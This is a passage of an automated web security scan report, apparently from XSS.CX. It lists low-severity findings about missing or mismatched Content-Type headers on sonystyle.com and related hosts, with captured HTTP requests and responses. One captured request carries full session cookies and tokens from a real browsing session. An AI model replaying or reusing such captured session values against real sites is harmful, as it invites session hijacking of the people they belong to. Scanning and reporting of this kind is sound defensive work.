If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

18.1. http://sr2.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sr2.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=71737897 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71737897
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1dbf"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17291
Date: Thu, 23 Jun 2011 14:58:27 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

18.2. http://www.apache.org/licenses/LICENSE-2.0 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.apache.org
Path:	/licenses/LICENSE-2.0

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /licenses/LICENSE-2.0 HTTP/1.1
Host: www.apache.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:39 GMT
Server: Apache/2.3.8 (Unix) mod_ssl/2.3.8 OpenSSL/1.0.0c
Content-Location: LICENSE-2.0.txt
Vary: negotiate,accept
TCN: choice
Last-Modified: Mon, 01 Nov 2010 19:49:36 GMT
ETag: "d23b5d-2c5e-494031b9e1400;49ce17c126e80"
Accept-Ranges: bytes
Content-Length: 11358
Cache-Control: max-age=3600
Expires: Thu, 23 Jun 2011 16:19:39 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/

TERMS AND CONDITIONS FOR USE, REPRODUC
...[SNIP]...

18.3. http://www.docs.sony.com/reflib/docget.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.docs.sony.com
Path:	/reflib/docget.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /reflib/docget.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.4. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.websitealive5.com
Path:	/4405/operator/guest/gLogin_Server.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

18.5. https://www.websitealive5.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.websitealive5.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

19. Content type is not specified previous
There are 2 instances of this issue:

/favicon.ico
/webapp/wcs/stores/servlet/CategoryDisplay

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

19.1. http://www.sonystyle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; mbox=session#1308841090453-474854#1308844298|PC#1308841090453-474854.17#1310052038|check#true#1308842498; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedburpburp; s_channel=%5B%5B%27Other%27%2C%271308842437917%27%5D%5D; s_sq=%5B%5BB%5D%5D; TS5bbf46=cefc48127b1086f50e229f977108f9dea8a8150f8ba2300a4e0359c7; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":3,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE

Response

HTTP/1.1 200 OK
Content-Length: 161
Date: Thu, 23 Jun 2011 15:23:49 GMT
Connection: close
Cache-Control: no-cache
Pragma: no-cache

<html><head><title>Request Restricted</title></head><body>The page you have requested is restricted.<br><br>Your support ID is: 9036114512303182655</body></html>

19.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/CategoryDisplay

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&identifier=S_Weekly_Deals&categoryKey=Computers HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 161
Date: Thu, 23 Jun 2011 15:20:01 GMT
Connection: close
Cache-Control: no-cache
Pragma: no-cache

<html><head><title>Request Restricted</title></head><body>The page you have requested is restricted.<br><br>Your support ID is: 9036114512303182439</body></html>

Report generated by XSS.CX at Thu Jun 23 10:54:06 CDT 2011.